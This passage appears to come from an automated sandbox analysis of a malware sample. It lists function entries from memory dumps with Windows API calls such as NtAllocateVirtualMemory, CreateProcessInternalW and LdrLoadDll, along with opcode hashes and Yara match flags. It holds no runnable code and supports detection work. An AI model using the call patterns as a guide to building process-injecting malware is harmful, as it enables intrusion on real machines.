                                                          • Instruction ID: 84f83dcc8b00bf95973e7eb5340de9e0cc91f13427c0ae65f8acdcde1d2891bb
                                                          • Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                          • Instruction Fuzzy Hash: 14F0F8B6210208AFCB14DF99DC95EAB77A9BF88250F158159BE1897241C630E950CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,032E2D11,00002000,00003000,00000004), ref: 032F83C9
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 0b052f38c13393c9b48047d66ec5e1bc6b044f56e5054872268d2d3914c393d5
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: F9F015B6210208AFCB14DF89CC80EEBB7ADAF88650F118158BE0897241C630F810CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(032F3D20,?,?,032F3D20,00000000,FFFFFFFF), ref: 032F8305
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 6de6562db6de1835fe36f61c31c23e65106b7e7828038f3cd0f510becb581bd3
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 3AD012762003146BDB10EF98CC45ED7B75CEF44650F154455BA185B241C570F90086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 822f2cf7f226d3c4f2c1705e5f90234b7aaa1aac9706f764c7f9a47e5e8b34c5
                                                          • Instruction ID: eec83723c423c0bb4ca2dfe82aa5c20bdac02f4b7a3bd38a7299fa2d7070d8b9
                                                          • Opcode Fuzzy Hash: 822f2cf7f226d3c4f2c1705e5f90234b7aaa1aac9706f764c7f9a47e5e8b34c5
                                                          • Instruction Fuzzy Hash: AC90026121185442D200A5794C18B17140597D0343F51C516A0144554CCA5588716571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1c56fdde521a78d312a59d5d4a923c35d52656883695f023cef66dda34e340a2
                                                          • Instruction ID: 6640d1ca8e7ea3ef49ea1ed91b5f7517a61d51f7a3383b7167fcad9795c877a8
                                                          • Opcode Fuzzy Hash: 1c56fdde521a78d312a59d5d4a923c35d52656883695f023cef66dda34e340a2
                                                          • Instruction Fuzzy Hash: DE9002A134105842D100A1694418B161405D7E1341F51C416E1054554D8759CC627176
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c3c5001240acb05f53e64480bb982ad4ffef36eb92513565964356e492f8fef3
                                                          • Instruction ID: 26c39d919775af88f51b4965259cb13bd16c17139870fa3bf3dac3d252b4140d
                                                          • Opcode Fuzzy Hash: c3c5001240acb05f53e64480bb982ad4ffef36eb92513565964356e492f8fef3
                                                          • Instruction Fuzzy Hash: B09002B120105802D140B1694408756140597D0341F51C412A5054554E87998DE576B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fda6310c27d983d6a1c381077b6bedb7c151ad18b3367021195b59bc56472234
                                                          • Instruction ID: aaeeacab5ef558cf49e7c444149c61ea29d195ea8800adc3a1194869816f6950
                                                          • Opcode Fuzzy Hash: fda6310c27d983d6a1c381077b6bedb7c151ad18b3367021195b59bc56472234
                                                          • Instruction Fuzzy Hash: 0A90027120105813D111A1694508717140997D0281F91C813A0414558D97968962B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a406b5f8d575cc79dfff6e2a36327fdfd0ededf320214170a69982c0dcc3c8b4
                                                          • Instruction ID: b1bf139a32b63b70edd9396a732f1c716866893f951401332fd717b194627a17
                                                          • Opcode Fuzzy Hash: a406b5f8d575cc79dfff6e2a36327fdfd0ededf320214170a69982c0dcc3c8b4
                                                          • Instruction Fuzzy Hash: 53900261242095525545F16944085175406A7E0281791C413A1404950C86669866E671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f1371a8478fd3f328a1aec559d208fb440c7f03d73742d226a55937f00b31c21
                                                          • Instruction ID: b3fc4a9b9779c19ed0e9edc0aabe7bb4d3e2dbbcd0dc279dab15aa2b82851a3d
                                                          • Opcode Fuzzy Hash: f1371a8478fd3f328a1aec559d208fb440c7f03d73742d226a55937f00b31c21
                                                          • Instruction Fuzzy Hash: 9290026921305402D180B169540C61A140597D1242F91D816A0005558CCA5588796371
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31b2bf4ad90b3e8abaf72d6d9675438cb90ab945c145327e0ce996c18f11a78a
                                                          • Instruction ID: 2cefba6fd0d1a6ecd91b09e0de10637c7ffba94980cd1e096861a0c4a7ac9272
                                                          • Opcode Fuzzy Hash: 31b2bf4ad90b3e8abaf72d6d9675438cb90ab945c145327e0ce996c18f11a78a
                                                          • Instruction Fuzzy Hash: CF90027131119802D110A1698408716140597D1241F51C812A0814558D87D588A17172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: eabdda67a3bca39bd238dbc9af3c99be2ac944beebb8aa117d93af23fbaeeef4
                                                          • Instruction ID: 2b8cb0232ddaf89ef6b1ddb0246f85474ab809c56d3d1ba5066224ac048680f0
                                                          • Opcode Fuzzy Hash: eabdda67a3bca39bd238dbc9af3c99be2ac944beebb8aa117d93af23fbaeeef4
                                                          • Instruction Fuzzy Hash: 0290027120105802D100A5A9540C656140597E0341F51D412A5014555EC7A588A17171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: aba0499e87e6c36cea19799a699ecc32ede11f3c0d980b42e660ba86cd380f98
                                                          • Instruction ID: 8c17b03c5dcd39fc97ccf62b093adf7008469cd1377c60c4a868c037653bc96f
                                                          • Opcode Fuzzy Hash: aba0499e87e6c36cea19799a699ecc32ede11f3c0d980b42e660ba86cd380f98
                                                          • Instruction Fuzzy Hash: FF9002712010DC02D110A169840875A140597D0341F55C812A4414658D87D588A17171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2d06fdbb934175aae6fc437577ef3d8d0afd4d9887f95a9e6d1daa1267c0459b
                                                          • Instruction ID: 8e9c3a3f362f06dfda05a77114f10ae4fa878a18c1ad0eb11b902b646fe8e53c
                                                          • Opcode Fuzzy Hash: 2d06fdbb934175aae6fc437577ef3d8d0afd4d9887f95a9e6d1daa1267c0459b
                                                          • Instruction Fuzzy Hash: 6190027120105C42D100A1694408B56140597E0341F51C417A0114654D8755C8617571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a06d6166d83b4c5fecbd66be3dca6d3fe4674d64f851a9b00003415ded5bc5b9
                                                          • Instruction ID: 04de050a2158d03e7b71c6082b8e43bf258a99fbd9b980be9b6ba91ced89f728
                                                          • Opcode Fuzzy Hash: a06d6166d83b4c5fecbd66be3dca6d3fe4674d64f851a9b00003415ded5bc5b9
                                                          • Instruction Fuzzy Hash: 5590027120105C02D180B169440865A140597D1341F91C416A0015654DCB558A6977F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 96aa0e9c8f2d124bce24be3c798eeb0d630b967a7badc8f4f63a28565668e762
                                                          • Instruction ID: 63e4980d67cba7e299ab7dc67357635ee7bf422d2bdb7f1d0be342f8bd1f6c55
                                                          • Opcode Fuzzy Hash: 96aa0e9c8f2d124bce24be3c798eeb0d630b967a7badc8f4f63a28565668e762
                                                          • Instruction Fuzzy Hash: 5890027120509C42D140B1694408A56141597D0345F51C412A0054694D97658D65B6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dd4ddabb33beee9adf86ae7d961a96766e8effeb97036962b7bb1065460ea932
                                                          • Instruction ID: ef0f7e1d5c4a9f1dba720975664131c52fb068bf35cfc37a243818842862af8a
                                                          • Opcode Fuzzy Hash: dd4ddabb33beee9adf86ae7d961a96766e8effeb97036962b7bb1065460ea932
                                                          • Instruction Fuzzy Hash: 9B9002A1202054034105B1694418626540A97E0241B51C422E1004590DC66588A17175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 47d3174ab3c457483abba932f8546afc85d7bed477d1b09c44ba1c1c07b6b9a4
                                                          • Instruction ID: b7576fb0bb1c85c1bcae59c9b9f32f64f3343c36bde40a2160f069e62aaa05af
                                                          • Opcode Fuzzy Hash: 47d3174ab3c457483abba932f8546afc85d7bed477d1b09c44ba1c1c07b6b9a4
                                                          • Instruction Fuzzy Hash: 0B900475311054030105F57D070C5171447D7D53D1351C433F1005550CD771CC717171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 032F6F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 821bfe3210b9d07f28607a44480a78fab0157264ff1508bf7136a910ffc51538
                                                          • Instruction ID: 885c2bdd3e602455c8d80dad0fda0c635b3fa62e7f5127295d0cfe643c40668a
                                                          • Opcode Fuzzy Hash: 821bfe3210b9d07f28607a44480a78fab0157264ff1508bf7136a910ffc51538
                                                          • Instruction Fuzzy Hash: A1316EB5611705AFC715DFA8C8A0FA7F7B8EB48700F04852DF61A9B241D770A585CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 032F6F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: fc31ccc9583b5b9ff213dcba823a91084eff1c76338815390234c7de6a346ebd
                                                          • Instruction ID: b1a8d71e4647d6cb7e989cf791cdde472f70caf800a4a7c22cf39a35ef162af2
                                                          • Opcode Fuzzy Hash: fc31ccc9583b5b9ff213dcba823a91084eff1c76338815390234c7de6a346ebd
                                                          • Instruction Fuzzy Hash: 29318EB5611705AFC710EFA4C8A1FAAFBB8FF88704F04816DF61A5B241D370A485CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,032E3B93), ref: 032F84ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                          • Instruction ID: ece2ef3f1b00b6b7b49cfb2259315bf5484175477830e126ea2cf22256fbf440
                                                          • Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                          • Instruction Fuzzy Hash: 1EE06DB6200304ABDB14DF64CC48EA7776CAF88750F114199FE085B342D671E901CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,032E3B93), ref: 032F84ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 0af8871242a53b11f226071836c6add47e0fda55bd8631bb5905a2a06ef56a5c
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 6DE01AB52102046BDB14DF59CC44EA777ACAF88650F014554BA085B241C630E9108AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 032E72BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 032E72DB
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction ID: 9a37ec32ccc075d3e5c23d044abe3b9e3690a12800e963d8ceb009fcd79e2bc7
                                                          • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction Fuzzy Hash: 54018F75A903297AEB20E6949C02FBEB66C5F01B50F540119FF04BE1C1E6E4698686F5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 032F8584
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                          • Instruction ID: 9b8c03eaebcd57f7afb82aa5b14b9a23b79a80b14eadb91cd879572b2e4a30b0
                                                          • Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                          • Instruction Fuzzy Hash: DC1102B6210208BFCB04DF98DC80DEBB7ADAF8C654F118258FA0D97241DA30E9518BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 032E9B82
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: fb6ef948536544c32a4ee05c2cdcc3051e88fdf3aa653636b02efc74354eb59b
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: 740125B9D5020DABDF10EBE4DC42F9DF3789F54208F0441A5EA089B240F675E794CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(032F3506,?,032F3C7F,032F3C7F,?,032F3506,?,?,?,?,?,00000000,00000000,?), ref: 032F84AD
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                          • Instruction ID: 4b235f7deed308ea3e13dfb4f8843f5dfe4674e58a8f0cbc6a4367d0eb3dda81
                                                          • Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                          • Instruction Fuzzy Hash: BCF062767102146FDB24EF98EC84EE7B36DEF88760B108569FA4C9B201C631EA5587E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 032F8584
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: ef08d9df2c8da7bb1df21f09603e479bb1024411fd6490cea374c46835321034
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: F001AFB2210208AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,032ECCC0,?,?), ref: 032F703C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                          • Instruction ID: 981da0423c308be0f74a43b12c8ec26f99ce53762d213e9d79275af6e95e989e
                                                          • Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                          • Instruction Fuzzy Hash: 3FF0E5762503007BD730A648CC03FE7B258DF95B50F240029F749AF2C0C9D5F94246E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,032ECCC0,?,?), ref: 032F703C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                          • Instruction ID: 040a0dae72221420ece9f9183e8f4495e10b9d55a515931bb1043499844fbade
                                                          • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                          • Instruction Fuzzy Hash: 33E06D373903043AE330A599AC02FA7B29C9B81B61F14003AFB0DEA2C0D595F84142A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,032ECF92,032ECF92,?,00000000,?,?), ref: 032F8650
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: f553aa937ee8eb6d177277ea5a293e3fd02c4f5f25c6aa9a0f6faf7e4ecf92b9
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: C1E01AB52002086BDB10DF59CC84EE777ADAF88650F018164BA085B241CA30E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(032F3506,?,032F3C7F,032F3C7F,?,032F3506,?,?,?,?,?,00000000,00000000,?), ref: 032F84AD
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: 37cda2ade185d719d4256e3de981d25033455c0c0f6b14f815811ced661d4d3f
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: A4E012B6210208ABDB14EF99CC40EA7B7ACAF88650F118558BA085B241CA30F9108AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,032E7C63,?), ref: 032ED42B
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction ID: 13e7ac77e46765e5743020118ac8afd1424e193475b17299f610d4a0607928b1
                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction Fuzzy Hash: E4D05E667A03043AE610FAA49C03F26B2C9AB54A04F494064FA489A2C3D950E40041A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
